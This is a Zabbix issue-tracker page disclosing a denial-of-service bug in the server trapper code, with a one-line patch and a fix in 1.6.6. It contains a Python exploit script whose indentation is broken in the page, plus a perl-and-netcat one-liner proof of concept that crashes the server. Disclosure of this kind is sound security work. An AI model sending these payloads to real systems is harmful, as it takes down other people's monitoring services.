Details

    • Type: Bug Bug
    • Status: Closed
    • Priority: Critical Critical
    • Resolution: Fixed
    • Affects Version/s: 1.6
    • Fix Version/s: 1.6
    • Component/s: Proxy (P), Server (S)
    • Labels:
      None
    • Environment:
      Zabbix server v1.6.x

      Description

      While reading Zabbix source code, I found a small error leading to an
      easy to exploit denial of service vulnerability (tested in version 1.6.1
      as shipped on Ubuntu and 1.6.5 compiled from source).

      In src/zabbix_server/trapper/trapper.c, function process_trap() :

      1. Make a truncated to 2047 copy of "s"
        strscpy(copy,s);
      1. Check if there's some ":" in "s" (and not in "copy" !)
        server=(char *)strtok(s,":");

      [...]

      1. Look for the 1st ":" in "copy"
        value_string=strchr(copy,':');
      1. If 1st ":" in "s" if after offset 2047
      2. we got a null ptr deference crash
        value_string=strchr(value_string+1,':');

      The patch is trivial : just use "copy" instead of "s" in your check.

      server=(char *)strtok(copy,":");

      Exploit code :

      8<-----------------------------------------------------------------
      #!/usr/bin/python

      PORT = 10051
      HOST = "192.168.2.89"

      import socket
      import struct

      try:
      socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      socket.settimeout(3)
      socket.connect((HOST, PORT))

      header = 'ZBXD\x01'

      1. DoS in ./src/zabbix_server/trapper/trapper.c
      2. If first ":" is after 2047 => DoS when reading NULL+1
        data = 'A'*2050 + ':B'

      size = struct.pack('q', len(data))
      socket.send(header + size + data)
      rcvdata = socket.recv(10240)
      print rcvdata
      except:
      print "FAIL"

      socket.close()
      8<-----------------------------------------------------------------

        Activity

        Hide
        Alexander Vladishev added a comment -

        Fixed in version pre1.6.6, rev. 7690.

        Show
        Alexander Vladishev added a comment - Fixed in version pre1.6.6, rev. 7690.
        Hide
        richlv added a comment -

        closing all resolved issues

        Show
        richlv added a comment - closing all resolved issues
        Hide
        Rafael Gomes added a comment -

        I got this error with exploit:

        File "166.pl", line 18
        data = 'A'*2050 + ':B'
        ^
        SyntaxError: invalid syntax

        My Zabbix server 1.6.4 was compiled from source.

        My version is affected too?

        Show
        Rafael Gomes added a comment - I got this error with exploit: File "166.pl", line 18 data = 'A'*2050 + ':B' ^ SyntaxError: invalid syntax My Zabbix server 1.6.4 was compiled from source. My version is affected too?
        Hide
        richlv added a comment -

        ad the original comment said, it should be fixed in 1.6.6

        ZBX-993#action_16403

        Show
        richlv added a comment - ad the original comment said, it should be fixed in 1.6.6 ZBX-993 #action_16403
        Hide
        richlv added a comment -
        Show
        richlv added a comment - let's try full link then... https://support.zabbix.com/browse/ZBX-993#action_16403
        Hide
        Rafael Gomes added a comment -

        I just wanna know if my version is affected, because I can't exploit with this code.

        Show
        Rafael Gomes added a comment - I just wanna know if my version is affected, because I can't exploit with this code.
        Hide
        Nicob added a comment -

        Indentation of the provided exploit code is broken.

        Version 1.6.4 (even from source) is affected, but you may try the following PoC :
        perl -e 'print "ZBXD\x01" . "A"x2050 . ":B";' | nc -v 127.0.0.1 10051

        Show
        Nicob added a comment - Indentation of the provided exploit code is broken. Version 1.6.4 (even from source) is affected, but you may try the following PoC : perl -e 'print "ZBXD\x01" . "A"x2050 . ":B";' | nc -v 127.0.0.1 10051
        Hide
        Rafael Gomes added a comment -

        Hi Nicob,

        Thanks for you help, but I can't exploit it yet.

        When I put your code in server, I didn't get anything and my server still running

        Show
        Rafael Gomes added a comment - Hi Nicob, Thanks for you help, but I can't exploit it yet. When I put your code in server, I didn't get anything and my server still running

          People

          • Assignee:
            Alexander Vladishev
            Reporter:
            Alexander Vladishev
          • Votes:
            0 Vote for this issue
            Watchers:
            2 Start watching this issue

            Dates

            • Created:
              Updated:
              Resolved: